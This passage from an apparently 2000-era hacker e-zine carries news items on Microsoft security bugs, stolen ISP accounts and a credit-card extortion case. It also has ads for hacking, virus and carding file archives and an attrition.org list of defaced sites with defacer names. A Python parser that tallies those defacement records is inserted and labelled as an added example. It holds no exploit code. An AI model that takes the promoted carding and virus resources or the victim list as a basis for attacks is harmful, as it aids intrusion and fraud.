bad people. Stay away from them." 
In addition to JavaScript, other common scripting languages include AppleScript, CGI, HTMLScript, Perl and VBScript. JavaScript is standardized under the European Computer Manufacturer's Association (ECMA), an international standards body based in Switzerland. @HWA 193.0 Microsoft battles pair of security bugs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Slash Microsoft bug exterminators are at work on two security flaws that could expose users' information to the prying eyes of online attackers. Full Story <http://www.ukhackers.com/0602005.htm> Microsoft battles pair of security bugs Microsoft bug exterminators are at work on two security flaws that could expose users' information to the prying eyes of online attackers. Microsoft has acknowledged that bugs in its Java virtual machine for the Internet Explorer browser and its Outlook Express mail reader for IE enable malicious hackers to look at more than they ought to be able to see on targets' computers. Microsoft said it was devising patches for both holes. With Outlook Express, a malicious user can embed a script within a message that will let him or her read the mail of the targeted user while the initial message window remains open. The bug does not affect the standard version of Outlook. "This could potentially let a malicious user read email, but under pretty restricted conditions," a Microsoft representative said. "And it only allows email to be read--not changed or altered." Pending a fix, Microsoft said that concerned users can turn off Active Scripting within IE's Restricted Zone and reconfigure Outlook Express to open email within the restricted zone. The second problem, in Microsoft's Java virtual machine, also permits the improper reading of files on the user's computer. 
Originally discovered, described and demonstrated by Kensuke Tada, the vulnerability lets a Java applet read, but not write to or delete, "known files," which could include the registry file or other files with common names like "memo.txt" or "password.txt."

A Java applet is a small application written in Java such as an online spreadsheet or news ticker. The Java virtual machine translates code written in the cross-platform Java programming language into code that computers can understand.

Microsoft said it learned of the problem over the weekend and immediately began working on its patch. The company downplayed the seriousness of the problem, saying the attacker could only access a particular directory that was most often empty. Microsoft also said the problem was simple to patch and that all versions of the JVM would be patched this weekend.

@HWA

194.0 Ex-CIA chief surfed Web on home computer with top-secret data
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Slash

Former CIA Director John Deutch used a home computer that contained sensitive information to access the Internet, a CIA report concluded, raising fears that secrets stored on the machine could have been stolen.

Full Story <http://www.ukhackers.com/0602009.htm>

Former CIA Director John Deutch's alleged use of a home computer to store classified materials has sparked a security scare in the U.S. intelligence community and has also pointed out a problem many Internet users are not aware of.

The minute anyone logs onto the Internet, financial records and other personal information stored on a home computer are an open book to any cyber-thief. Security experts say Deutch would be a much bigger target than the average person.

"There are known foreign intelligence agents operating on the Internet today ... and they are actively seeking U.S. intelligence on the Internet," said Daniel Verton of Federal Computer Week.

"It's hard to know exactly what he had on his home computer," Verton said. "But we do know that it was thousands of pages in length, we do know it was top secret and probably ranged the entire breadth of classifications, from unclassified to top secret code word information."

Most hackers are more interested in larceny than espionage, targeting credit card numbers and bank records. Those records are becoming more vulnerable as the number of people using the Internet grows.

'A huge vulnerability'

The modems that most home computers use to connect to the Internet are difficult, but not impossible, for a thief to crack. But some new ways to log on are less secure.

"We're seeing things like broadband Internet ... faster connections that are always on," said PC World Magazine's Sean Dugan. "That's a huge vulnerability."

Computers connected to the Internet through high-speed cable modems are at the highest risk, because they share the line with other people.

Danger lurks in 'Trojan Horses'

Microsoft Windows even has a setting that lets users share information with those people. This function can be disabled if you don't want others to have access to your computer.

Another point of entry is through e-mail attachments, where so-called "Trojan horses" can be hidden. These programs give thieves the ability to control another computer from a remote location, without the user's knowledge.

Security software and programs that scramble or encrypt data are available, but experts say the best way for users to protect themselves is to keep private information off-line.

@HWA

195.0 How Safe Is AOL 5.0?
~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Slash

AOL is hit with $8 billion lawsuit over its latest client software.

Internet service provider giant America Online took a potentially damaging hit Monday as it was handed a class-action lawsuit demanding at least $8 billion in damages apparently caused by its Internet software AOL 5.0.

The lawsuit, filed in the U.S. District Court in Alexandria, Virginia, seeks $1000, or three times the amount of damage (whichever is greater) each for the estimated 8 million people who have already downloaded the faulty software and "have had the operation of their computer altered as a result thereof," according to the filing.

AOL officials responded on Wednesday by stating their intent to fight the allegations.

"[The allegations] have no basis in fact or law and we intend to vigorously contest them," said Rich D'Amato, an AOL spokesperson. "[Version 5.0] does not prevent members from accessing the Internet through other providers."

User Complaints Rise

AOL has come under much criticism since releasing the software as users have complained of interference it causes with other computer programs, particularly software of other ISPs.

The filing alleges that "as part of its normal operation, Version 5.0 disables, interrupts, alters, or interferes with operations of other software installed on those same computers, including but not limited to disabling any other internet software which provides internet access by non-AOL ISPs that also may be installed on the computer." In particular, the lawsuit claims that "AOL knew of or should have known that it operated in such a manner."

"I upgraded to AOL 5.0 and blindly thought everything went fine," said Kenneth Novak, who uses AOL as a backup. "When I tried to dial in to my work location with dial-up networking, I was unable to use the IE [Internet Explorer] 5.0 browser through our firewall."

The problem seems to be affecting people from all technological backgrounds as well, perplexing the first-time user and veteran computer and Internet users alike.

"I am a computer consultant and I know my way around installing software," said Kevin Wohler, another self-proclaimed AOL 5.0 victim. "I ran into multiple problems, not the least of which was the interference with my normal ISP."

Unauthorized Changes?
Most of all, users were most distressed about how an "upgrade" seemed to cause mostly harmful and unauthorized changes to their systems.

"AOL made changes to my system that I would have never agreed to," Wohler said.

AOL officials, however, claim that AOL 5.0 does not make any changes to anything, including settings, unless the user permits them.

"AOL software allows users the ability to set AOL as their default," D'Amato said. "They must choose AOL to be their default Internet setting."

@HWA

196.0 Teens steal thousands of net accounts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.computerworld.com/home/print.nsf/idgnet/000113DD2E

Teens steal thousands of Net accounts
By Ann Harrison
01/13/2000

A group of teen-age computer crackers allegedly used thousands of stolen Internet accounts to probe the networks of two national nuclear weapons laboratories, according to law enforcement authorities in California.

At least five crackers, ages 15 to 17, compromised accounts at 17 Internet service providers in the U.S., Romania and Australia and used the accounts to attack nine targets including the Sandia and Oak Ridge National Laboratories and Harvard University, according to Capt. Jan Hoganson of the Sacramento Valley High-Tech Crimes Task Force in California.

The crackers managed to gain root access to computers at Harvard, Hoganson said, but just scanned the national lab networks to look for vulnerabilities. The intruders stole 200,000 accounts alone from San Francisco-based Pacific Bell Internet Services for use in the attack.

According to Hoganson, the stolen accounts were used to scan for open network ports at the labs, which could be used for subsequent attacks. Hoganson emphasized that the laboratory networks themselves weren't compromised.

He said law enforcement authorities were notified of the scans Dec. 7, by an El Dorado Hills, Calif.-based Internet service provider called InnerCite, which had received complaints from the labs that accounts it hosted were used in the scans.

"The feds say it was an unwelcome visit, but there was no criminal action committed," said Hoganson, who likened the action to nighttime intruders rattling the doorknobs of a locked business. "Fortunately, the ISP preserved the evidence," he said.

Damian Frisby, a detective with the Sacramento Valley High-Tech Crimes Task Force, said the FBI is now contacting other service providers from which accounts were allegedly stolen. He said the young intruders, who allegedly belong to a cracking group called Global Hell, had been tracked down and contacted by authorities after they bragged of their exploits in Internet chat rooms.

While no charges have yet been filed, Frisby said he expects that some of the attackers will eventually be charged with unlawful access of a computer and possibly grand theft.

"One of the first things an ISP considers is to shut these people down -- which is great for security and stops the attack, but it makes it hard for us to track them down," said Frisby. "They should contact law enforcement, but they have to make the decision whether to track them down or cut them off, and we can't tell them what to do."

Frisby noted that while some of the compromised Internet service providers had chosen to cooperate with law enforcement, one, PSINet Inc. in Herndon, Va., demanded a search warrant before taking any action. "We don't want to violate anyone's rights, but it delays the process," said Frisby. PSINet wasn't available to comment on the request.

While the investigation is ongoing, Frisby said service providers should guard against the theft of account data by taking care to update operating systems with current security patches and maintain effective firewalls. "It is a hard job to do because there are new exploits everyday," he said.
Frisby added that many of the compromised Pac Bell accounts used passwords that were easy to uncover using standard dictionary programs that search for known words. He said the attackers somehow obtained a list of 200,000 Pac Bell user accounts and were able to successfully steal the passwords for about 95,000 accounts.

Michelle Strykowski, a spokeswoman for Pacific Bell Internet Services, a subsidiary of SBC Communications Inc., based in San Antonio, disputed the number of compromised passwords. Strykowski said 63,000 passwords had been decoded, but Pac Bell was still unsure how the accounts were compromised. She said there has been no indication that the account information has been abused elsewhere and no customers have complained.

According to Strykowski, the company sent an advisory to customers Jan. 7, warning of a security breach and advising them to change their passwords to include uppercase and lowercase characters, symbols and numbers, which makes them more difficult to crack. She said Pac Bell's 330,000 California Internet customers were also advised to change their passwords every 90 days and to not use the same passwords for a number of different accounts.

"Security is a top priority for Pacific Bell, and we are working closely with the police, but these hackers have proved to the Internet as a whole that we must maintain vigilance," said Strykowski, who noted that the Global Hell cracking group had also compromised Web sites at the FBI and the White House. "All other ISPs, like Pac Bell, have to constantly scrutinize security and make recommendations to customers to be responsible Internet users and change their passwords."

@HWA

197.0 Online Credit Hacker May Be Out For Profit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.apbnews.com/newscenter/internetcrime/2000/01/14/hack0114_01.html

Online Credit Hacker May Be Out for Profit
Investigator Thinks 'Maxus' Is a Two-Person Team

Jan. 14, 2000
By David Noack

NEW YORK (APBnews.com) -- While a computer hacker maintains that he stole credit card numbers from an online retailer as revenge for poor service and a couple of broken CDs, a security expert believes that "Maxus" is actually a two-man team in Russia engaged in a well-organized credit card fraud.

In an e-mail message to APBnews.com, Maxus gave his motives for hacking into CD Universe's customer credit card database. He acknowledged stealing 300,000 card numbers and trying to extort $100,000 from the company by threatening to post the information online.

"They send me two broken CDs, and I conclude test of their site for bugs. ... Their service is not good. Amazon is better," he said.

In an e-mail exchange, Maxus said he might post more of the pilfered credit card numbers online, and he claimed that he still can get into the CD Universe database if he wants. "They can't fix it without me," Maxus boasted.

Admits one previous theft

Maxus also said he has stolen credit card information once before, in 1997. He claimed he got 20 then but declined to say where they were from or what he did with the information. He said he is using a computer with Windows 2000, Solaris and a Pentium III.

Attempts to reach Maxus with additional questions and clarifications were unsuccessful. Brad Greenspan, chairman of e-Universe, the parent company of CD Universe, could not be reached for comment.

Does Maxus have associates?

Meanwhile, AntiOnline, an online computer security publication and consulting firm, which conducted its own investigation into the hacking incident, suspects the operation is more organized and widespread than Maxus concedes.

John Vranesevich, the founder of AntiOnline, said that Maxus does not work alone. "We believe there are about a dozen that are close to Maxus. We don't have any hard evidence, but that is the impression we get. There are also some in Canada," said Vranesevich.
He said the Web page that Maxus set up initially, which included some of the stolen credit card numbers as part of the extortion threat against CD Universe, was really an effort to peddle or advertise the credit card numbers to buyers.

A four-layered scheme?

The credit card scheme, says AntiOnline, has four parts: Maxus' partners first buy the numbers in wholesale lots of $1,000 for $1 a number. The card numbers are resold in blocks of 50 for a round price of $500. First-round buyers who keep numbers for themselves must pay Maxus a hefty kickback.

AntiOnline believes Maxus uses "CyberCash" software to set himself up as an online merchant, entering the stolen numbers as if customers in his store were using the cards. In this case, the software "sees to it that the stolen credit cards are charged, and that the 'merchant' or in this case, 'thief,' gets the funds 'owed to him' electronically deposited into a bank account," Vranesevich reported in AntiOnline.

The "final buyers" of the card numbers use them to access online pornography sites or for online gambling. They also can order computer equipment online.

Finds two partners

Vranesevich believes he has identified Maxus as Maxim Ivancov, and also another individual, who is called Diagnoz or Evgenij Fedorov, who may be in his 30s. Both have set up accounts at either banks or money transfer companies in order to complete the transactions.

AntiOnline recommends that any user who shopped at CD Universe cancel their credit cards immediately. Vranesevich said that information from the AntiOnline investigation has been turned over to the FBI. He declined to say with which FBI office he was working.

"The fact that CD Universe or the credit card companies would suggest to anyone that they could keep these credit cards accounts until they notice suspicious activity is ridiculous," said Vranesevich.
May be at risk from Russian mob

William Callahan, president of Unitel, a multinational investigative and security company, suspects that the Russian hackers are a small group and their greatest threat is not from law enforcement, but from Russian mobsters.

"This is a small crowd of young Russian hackers who are incredibly adept at computer stuff, they have no scruples and are just having fun stealing money," said Callahan.

However, he cautioned, once organized crime in Russia gets wind of what they are doing, they will muscle in on the operation.

"They will use them and extort them. They have to watch over their shoulder. [The Russian mobsters] are always looking for ways to launder money offshore," said Callahan, a former federal prosecutor.

Purdue University professor Eugene Spafford, director of a new multidisciplinary center designed to tackle issues related to information security, finds Maxus' story of a revenge hack "plausible."

"I do not know where the liability lies, because I do not know for certain where 'Maxus' got the numbers -- if he did -- nor do I know how," Spafford said. "If the story is as he presented it, then there is some blame to be laid at the merchant, and some with the company that provided the e-commerce software."

@HWA

AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ADVERTISING IS FREE, SEND IN YOUR ADS TO CRUCIPHUX@DOK.ORG

______________________________________________________________

French Hackers' Portal / Le Portail Des Lascars Francophones
Links and News of interest / Liens et news pour lascars. ;-)

--------------------------------------------------------------
->->->->->->->->-> http://lascars.cjb.net <-<-<-<-<-<-<-<-<-
______________________________________________________________

http://revenger.hypermart.net

's T E X T Z   F I L E   HOMEPAGE

http://revenger.hypermart.net

Here you may find up to 340 text files for:
ANARCHY, HACKING, GUIDES, CRACKING, VIRUS, GENERAL, ELECTRONICS, UNIX,
MAGAZINES, TOP SECRET, CARDING, U.F.O.s, LOCKPICKING, IRC, PHREAKING,
BOOKS AND A-S FILES AVAILABLE!

http://revenger.hypermart.net

Visit Us Now !

- / - w w w . h a c k u n l i m i t e d . c o m - / -

**************************************************************************
*                                                                        *
*   ATTRITION.ORG           http://www.attrition.org                     *
*   ATTRITION.ORG           Advisory Archive, Hacked Page Mirror         *
*   ATTRITION.ORG           DoS Database, Crypto Archive                 *
*   ATTRITION.ORG           Sarcasm, Rudeness, and More.                 *
*                                                                        *
**************************************************************************

+------------------------------------------------------------------------+
| SmoG Alert ..          http://smog.cjb.net/      NEWS on SCIENCE       |
| ===================    http://smog.cjb.net/      NEWS on SECURITY      |
| NEWS/NEWS/NEWS/NEWS    http://smog.cjb.net/      NEWS on THE NET       |
|                        http://smog.cjb.net/      NEWS on TECHNOLOGY    |
+------------------------------------------------------------------------+

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
*   www.csoft.net   webhosting, shell, unlimited hits bandwidth ...     *
*   www.csoft.net   www.csoft.net   www.csoft.net   www.csoft.net       *
*   http://www.csoft.net/                                               *
*   One of our sponsors, visit them now                                 *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* 2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

@HWA

HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~

Don't worry. worry a *lot*

http://www.ircnews.com/ Vol 1 Issue 1 Jan 3, 2000

Funny Story Gets Cut/Pasted To Channel 28 Times

CINCINNATI, OH - A C/NET News.com story relating to another huge goof-up made by Microsoft's free email service, Hotmail.com, excited chatters on irc.openprojects.net's #linuxhelp channel. In fact, the people enjoyed the story so much that it got posted 28 times by various people.

The initial joy the story brought to #linuxhelp was quickly offset as tempers flared and the channel administration hastily +moderated the channel in an effort to restore order in the out-of-control chat room.

"Fuck off.", said MbM, immediately after setting the +m. "We all have browsers, we don't need people posting the story every 30 seconds."

Witnesses claimed that there was no initial response from the #linuxhelp regulars to MbM's actions, because "nobody had been +voiced". The chat room was described as "very quiet".

IRCNews.com learned that the cut and pasted story was in regards to Microsoft forgetting to pay the $35 registration fee for the passport.com domain name (the authentication part of Hotmail.com), leaving millions of people without access to their email. A Linux programmer forked out the $35 on behalf of Microsoft, and the popular freemail service was back in business.

Everyone agreed that the News.com story was "very funny". One #linuxhelp regular named kernel_ said that it came as little surprise to anyone that people would want to cut and paste it.

"OMG, okay. PiNkEyE tells me to go check out this story about M$ and Hotmail, so I do, and it's hysterical. So I post the URL to #linuxhelp, and about 2 minutes later, all hell broke loose!"

kernel_ added, "At first I saw a few hahaha's and LOL's. Then people start posting parts of the article to the channel. Before I knew it, people are tripping out and probably a hundred lines of text was scrolling by every 5 seconds! It got out of control."

"It all happened so fast.", commented Etriaph, also a #linuxhelp regular. "I remember getting up to make some Pop-Tarts and I come back and like quotes are flying all over, people are saying shut up, fights are breaking out, more quoted text, people leaving the channel to avoid the spam. It was like a warzone."

MbM quickly stepped in to restore peace to the chat room. After several reported attempts to calm the channel by telling people to "stop that", MbM was left with no choice but to +moderate, which he did. MbM's quick thinking may have saved thousands of lines of spam from being shown to the 40 or so people visiting #linuxhelp at the time.

When asked for his version of the events, MbM told IRCNews.com to "Fuck off."

-=-

Submitted by Black Dome:

<oscillator> no my winunix98 is eleet
<oscillator> i call it winix
<tcp-ip> winix?
<oscillator> hell yea
<oscillator> all microsoft made!
<oscillator> my aol is flying on it
<tcp-ip> is it pretty good?
<oscillator> very good
<tcp-ip> where you get ti?
<oscillator> my aol punters and scrollers work well on it, and it even comes with a warez server!
<tcp-ip> where you get it?
<oscillator> i wrote most of it myself of course. on vb

Max the SysOp (oscillator)

-----------------------------------------------

One OS to rule them all, One OS to find them.
One OS to call them all, And in salvation bind them.
In the bright land of Linux, Where the hackers play.

(J. Scott Thayer, with apologies to J.R.R.T.)

And of course... The 'Free Trout' site.. <heh>

http://freetrout.bow.org/

@HWA

=-----------------------------------------------------------------------=

SITE.1

#1 GRASS ROOTS SECURITY SITE

http://www.linuxsecurity.com/

Run by: Pr0xy

Brand new. Check this out! krad layout, lots of info, definitely a place to add to your security bookmarks. Go there today!

#2 COMMERCIAL SECURITY SITE:

http://www.securiteam.com/

Nice security related site, just found it recently. Check it out, lots of info. - Ed

#3 DAMAGE INC.

http://surf.to/damage_inc

Hack/Phreak Zine, nice flash site, but not overcrowded with graphics. Checking out the content now .. - Ed

You can send in submissions for this section too if you've found (or RUN) a cool site...

@HWA

H.W Hacked websites
~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'...

Hacker groups breakdown is available at Attrition.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Check out http://www.attrition.org/mirror/attrition/groups.html to see who you are up against. You can often gather intel from IRC as many of these groups maintain a presence by having a channel with their group name as the channel name, others aren't so obvious but do exist.
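The defacement reports that follow are in attrition.org's mirror format (Defaced domain / Site Title / Mirror / Defaced by / Operating System, plus optional "Previously defaced on ... by ..." and "Potentially offensive" lines). The parser below is an added example, not part of the zine or of attrition.org's tooling: it reads those records, drops the verbatim repeats the listing contains, pulls the defacement date out of the mirror URL, and tallies hits by platform, by defacer and by repeat-target domain, which is the first thing a defender wants from a list like this. The sample input is a handful of records copied from the listing in this issue.

```python
import re
from collections import Counter
from datetime import date

# Constructed sample: five records copied from the attrition.org listing in this
# issue, one field per line, blank line between records. www.rsl.com appears
# twice because the listing itself repeats it verbatim.
SAMPLE = """\
Defaced domain: www.rsl.com
Site Title: Rochester Systems Ltd.
Mirror: http://www.attrition.org/mirror/attrition/2000/01/19/www.rsl.com
Defaced by: lysergik
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.rsl.com
Site Title: Rochester Systems Ltd.
Mirror: http://www.attrition.org/mirror/attrition/2000/01/19/www.rsl.com
Defaced by: lysergik
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.mms.gov
Site Title: MMS
Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.mms.gov
Defaced by: forrest
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.10.29, 99.10.28, 99.12.31 by fuqrag, fuqrag, hv2k
Potentially offensive content on defaced page.

Defaced domain: ioc.unesco.org
Site title: UNESCO's Intergovernmental Oceanographic Commission
Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/ioc.unesco.org
Defaced by: confusion
Operating System: Windows NT 4.0
Potentially offensive content on defaced page.

Defaced domain: www.bluehat.com
Site Title: BlueHat
Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.bluehat.com
Defaced by: Klept0
Operating System: Red Hat Linux
Potentially offensive content on defaced page.
"""

# "Site Title" and "Site title" both occur in the listing, hence re.I.
FIELD_RE = re.compile(
    r"^(Defaced domain|Site Title|Mirror|Defaced by|Operating System|Attrition comment):\s*(.*)$",
    re.I)
PREV_RE = re.compile(r"^Previously defaced on (.*?) by\s*(.*)$")
DATE_RE = re.compile(r"/mirror/attrition/(\d{4})/(\d{2})/(\d{2})/")


def parse_records(text):
    """Split the listing into records and normalise each field name."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {"previous": [], "previous_by": [], "offensive": False}
        for line in block.splitlines():
            line = line.strip()
            m = FIELD_RE.match(line)
            if m:
                key = m.group(1).lower().replace(" ", "_")   # "Defaced by" -> defaced_by
                rec[key] = m.group(2).strip()
                continue
            m = PREV_RE.match(line)
            if m:   # dates and names are comma lists; the lists may be empty
                rec["previous"] = [d for d in re.split(r",\s*", m.group(1)) if d]
                rec["previous_by"] = [n for n in re.split(r",\s*", m.group(2)) if n]
                continue
            if line.startswith("Potentially offensive"):
                rec["offensive"] = True
        m = DATE_RE.search(rec.get("mirror", ""))   # date lives only in the mirror path
        rec["date"] = date(*map(int, m.groups())) if m else None
        records.append(rec)
    return records


def os_family(os_string):
    """Collapse attrition's free-text OS strings ("NT", "WinNT", "BSDI", ...) to a family."""
    s = (os_string or "").lower()
    if re.search(r"\b(windows|winnt|nt)\b", s):
        return "Windows"
    for needle, family in (("linux", "Linux"), ("solaris", "Solaris"),
                           ("bsd", "BSD"), ("unix", "Unix")):
        if needle in s:
            return family
    return "Unknown"


def summarize(records):
    """Deduplicate exact repeats, then count by platform, defacer and repeat target."""
    seen, unique = set(), []
    for r in records:
        key = (r.get("defaced_domain"), r.get("mirror"))
        if key not in seen:
            seen.add(key)
            unique.append(r)
    domains = Counter(r["defaced_domain"] for r in unique)
    repeats = {r["defaced_domain"] for r in unique if r["previous"]}
    repeats |= {d for d, n in domains.items() if n > 1}
    return {
        "records": len(unique),
        "duplicates": len(records) - len(unique),
        "by_os": Counter(os_family(r.get("operating_system")) for r in unique),
        "by_defacer": Counter(r.get("defaced_by", "unknown") for r in unique),
        "repeat_targets": sorted(repeats),
    }


if __name__ == "__main__":
    for k, v in summarize(parse_records(SAMPLE)).items():
        print(f"{k}: {v}")
```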
>Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< Defaced domain: www.waterworld.org Site Title: Ron Kobasa Mirror: http://www.attrition.org/mirror/attrition/2000/01/16/www.waterworld.org Defaced by: wkD Operating System: Linux Defaced domain: www.coolmail.com Site Title: Coolmail Partners Mirror: http://www.attrition.org/mirror/attrition/2000/01/16/www.coolmail.com Defaced by: wkD Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.cypoc.com Site Title: CYPOC Mirror: http://www.attrition.org/mirror/attrition/2000/01/17/www.cypoc.com Defaced by: Team China Operating System: Solaris 2.6 - 2.7 Potentially offensive content on defaced page. Defaced domain: www.gbrmpa.gov.au Site Title: Great Barrier Reef Marine Park Authority Mirror: http://www.attrition.org/mirror/attrition/2000/01/17/www.gbrmpa.gov.au Defaced by: 404 Crew Operating System: Solaris (PHP/4.0B2 mod_ssl/2.4.5 OpenSSL/0.9.4) Potentially offensive content on defaced page. Defaced domain: predator-vs-aliens.com Site Title: predator vs aliens Mirror: http://www.attrition.org/mirror/attrition/2000/01/17/predator-vs-aliens.com Defaced by: Cyberia / TerrorNet Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.madfishinc.com Site Title: Mad Fish Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/17/www.madfishinc.com Defaced by: wkD Operating System: Linux Potentially offensive content on defaced page. Defaced domain: thomas.loc.gov Site Title: US Congress Web site Mirror: http://www.attrition.org/mirror/attrition/2000/01/17/thomas.loc.gov Defaced by: LmT and r00tcrew Operating System: Unix FREE KEVIN reference in the HTML Potentially offensive content on defaced page. 
Attrition comment: This is the Library of Congress THOMAS Web site Defaced domain: www.ifi.gov.co Mirror: http://www.attrition.org/mirror/attrition/2000/01/18/www.ifi.gov.co Defaced by: IDK Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: wrox.boston.k12.ma.us Site Title: West Roxbury High School Mirror: http://www.attrition.org/mirror/attrition/2000/01/18/wrox.boston.k12.ma.us Defaced by: Team Echo Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.audi.de Site Title: Audi AG Mirror: http://www.attrition.org/mirror/attrition/2000/01/19/www.audi.de Defaced by: LmT Operating System: Solaris Potentially offensive content on defaced page. Attrition comment: This is the same group that defaced the THOMAS site Defaced domain: kent.handysoft.co.kr Site Title: Handy Soft Corporation Mirror: http://www.attrition.org/mirror/attrition/2000/01/19/kent.handysoft.co.kr Defaced by: tkz Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.gartlandfoundry.com Site Title: Gartland Foundry Mirror: http://www.attrition.org/mirror/attrition/2000/01/19/www.gartlandfoundry.com Defaced by: pariah Operating System: NT Potentially offensive content on defaced page. Defaced domain: www.idlecreek.com Site Title: Idle Creek Development, Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/19/www.idlecreek.com Defaced by: pariah Operating System: NT Potentially offensive content on defaced page. Defaced domain: www.culinaryinstitute.com Site Title: Institute of Culinary Arts Mirror: http://www.attrition.org/mirror/attrition/2000/01/19/www.culinaryinstitute.com Defaced by: Team Echo Operating System: NT Potentially offensive content on defaced page. Defaced domain: www.emcoin.com.ar Mirror: http://www.attrition.org/mirror/attrition/2000/01/19/www.emcoin.com.ar Operating System: BSDI Potentially offensive content on defaced page. 
Defaced domain: www.redetec.org.br Mirror: http://www.attrition.org/mirror/attrition/2000/01/19/www.redetec.org.br Defaced by: OHB Team Operating System: NT Potentially offensive content on defaced page. Defaced domain: www.rsl.com Site Title: Rochester Systems Ltd. Mirror: http://www.attrition.org/mirror/attrition/2000/01/19/www.rsl.com Defaced by: lysergik Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.rsl.com Site Title: Rochester Systems Ltd. Mirror: http://www.attrition.org/mirror/attrition/2000/01/19/www.rsl.com Defaced by: lysergik Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: rachelsnetwork.com Site Title: Rachel's Network Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/rachelsnetwork.com Defaced by: ph Operating System: BSD/OS Defaced domain: www.vnuhcm.edu.vn Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.vnuhcm.edu.vn Defaced by: Team-Echo Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.bacards.pvt.k12.mn.us Site Title: Minnesota K12 Schools Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.bacards.pvt.k12.mn.us Defaced by: bobabc Operating System: NT Potentially offensive content on defaced page. Defaced domain: www.simplewarez.com Site Title: Pedro Lucas Rocha Bessa Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.simplewarez.com Defaced by: bobabc Operating System: Linux Potentially offensive content on defaced page. 
Defaced domain: clea.wipo.int Site Title: World Intellectual Property Organization, Database of Intellectual Property Laws Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/clea.wipo.int Defaced by: phiber Operating System: Windows NT Defaced domain: www.ivi.org Site Title: The International Vaccine Institute Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.ivi.org Defaced by: confusion Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: pericles2.europarl.eu.int Site Title: European Parlement (site 2) Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/pericles2.europarl.eu.int Defaced by: confusion Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.pcmac.com Site Title: PC Mac Consultants Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.pcmac.com Defaced by: confusion Operating System: Windows NT Previously defaced on 99.11.28 by cipher Potentially offensive content on defaced page. Defaced domain: pericles1.europarl.eu.int Site Title: European Parliament Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/pericles1.europarl.eu.int Defaced by: confusion Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.bluehat.com Site Title: BlueHat Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.bluehat.com Defaced by: Klept0 Operating System: Red Hat Linux Potentially offensive content on defaced page. Defaced domain: mail.wateye.com Site Title: Watauge Eye Center, PA Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/mail.wateye.com Defaced by: Screaching Weasel Operating System: Red Hat Linux Potentially offensive content on defaced page. 
